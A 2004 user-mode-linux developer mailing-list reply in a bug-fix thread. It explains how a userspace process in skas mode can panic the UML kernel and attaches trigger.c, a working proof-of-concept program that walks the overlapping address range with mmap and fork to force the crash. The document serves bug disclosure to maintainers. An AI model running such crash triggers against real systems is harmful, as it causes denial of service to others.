From: azu <azu@sysgo.de>
To: user-mode-linux-devel@lists.sourceforge.net
Subject: Re: [uml-devel] bad panic "Kernel stack overflow" - demo exploit
Date: Wed, 30 Jun 2004 12:04:37 +0200	[thread overview]
Message-ID: <40E29034.7040504@sysgo.de> (raw)
In-Reply-To: <200406291604.51726.blaisorblade_spam@yahoo.it>


BlaisorBlade wrote:
> At 13:39, Monday 28 June 2004, azu wrote:
> 
>>Hi,
> 
> 
>>I triggered the following panic from userspace in skas mode
>>by mapping pages above 0xa0000000 ...
> 
> 
>>The check is useless in skas-mode (kernel faults get filtered
>>in segv() before handle_page_fault() is called),
>>so I added an ifdef for tt mode.
> 
> 
> This is a more sensible version of the patch (with runtime checking instead 
> of compile time), if I did not overlook anything: it must be an if(mode_tt). 
> I always compile in TT mode and normally don't use it (and sometimes UML does 
> not compile otherwise), and the patch must still work.
> 
> 
> However, I don't think this is the proper fix: please elaborate a bit more. 
> Segv() works the same way under TT and SKAS, and I think that more likely 
> there was an actual stack overflow (try to increase 
> CONFIG_KERNEL_STACK_ORDER and try to re-get the panic).
>

Paolo, your patch is the better one :-)

But it wasn't a stack overflow ...

Due to "overlapping" address spaces in skas mode,
it is possible to trigger the panic:
A userpage with the same address as current + 4096
must be valid in the vma, but not (yet) mapped to
the user:
0) addr = 0xa0000000
1) mmap a zero page to addr (valid vma) readwrite
2) fork -> mapping is now readonly
3) child writes to page
4) IF addr == current + 4096 THEN panic
5) addr += 4096
6) goto 1)

I wrote a small demo app to trigger the problem.
Limit your UML memory to 16MB or so to trigger the panic faster.



-Alex




[-- Attachment #2: trigger.c --]
[-- Type: text/x-csrc, Size: 961 bytes --]

/*
 * trigger.c - triggers panic("Kernel stack overflow") in UML
 *
 * 20040630, azu@sysgo.de
 */

#include <stdio.h>
#include <setjmp.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/wait.h>	/* waitpid() */

/* walk the user address range that overlaps the UML kernel's own
 * address space in skas mode, one page at a time */
#define LOW  0xa0000000
#define HIGH 0xb0000000

int main(int argc, char **argv)
{
	unsigned long addr;
	int fd;

	fd = open("/dev/zero", O_RDWR);

	printf("This may take some time ... one more cup of coffee ...\n");

	for(addr = LOW; addr < HIGH; addr += 0x1000)
	{
		pid_t p;
		/* 1) map a zero page at addr: the vma is valid, but the page
		 *    is not yet mapped into the user's address space */
		if(mmap((void*)addr, 0x1000, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0) == MAP_FAILED)
			printf("mmap failed\n");

		/* 2) fork: the child's copy of the mapping faults on first access */
		p = fork();
		if(p == -1)
			printf("fork failed\n");

		if(p == 0)
		{
			/* child context: 3) touch the page; if addr == current + 4096
			 * the fault handler's stack check panics the UML kernel */
			int *page = (int *)addr;
			volatile int x;

			x = *page;
			return 0;
		}
		/* father context */
		waitpid(p, 0, 0);

		/* 5) unmap and move on to the next page */
		if(munmap((void*)addr, 0x1000) == -1)
			printf("munmap failed\n");
	}

	close(fd);
	printf("done\n");
	return 0;
}

Thread overview: 11+ messages
2004-06-28 11:39 [uml-devel] Patch for arch/um/kernel/trap_kern.c to fix bad panic azu
2004-06-29 18:34 ` BlaisorBlade
2004-06-30 10:04   ` azu [this message]
2004-07-01 12:01     ` [uml-devel] bad panic "Kernel stack overflow" - demo exploit BlaisorBlade
2004-07-01 13:34     ` BlaisorBlade
2004-07-01 17:57       ` Alex Züpke
2004-07-01 19:33         ` BlaisorBlade
2004-07-03 18:25           ` BlaisorBlade
2004-08-17 15:40             ` BlaisorBlade
2004-08-20 15:09               ` Jeff Dike
2004-09-05 16:41                 ` BlaisorBlade
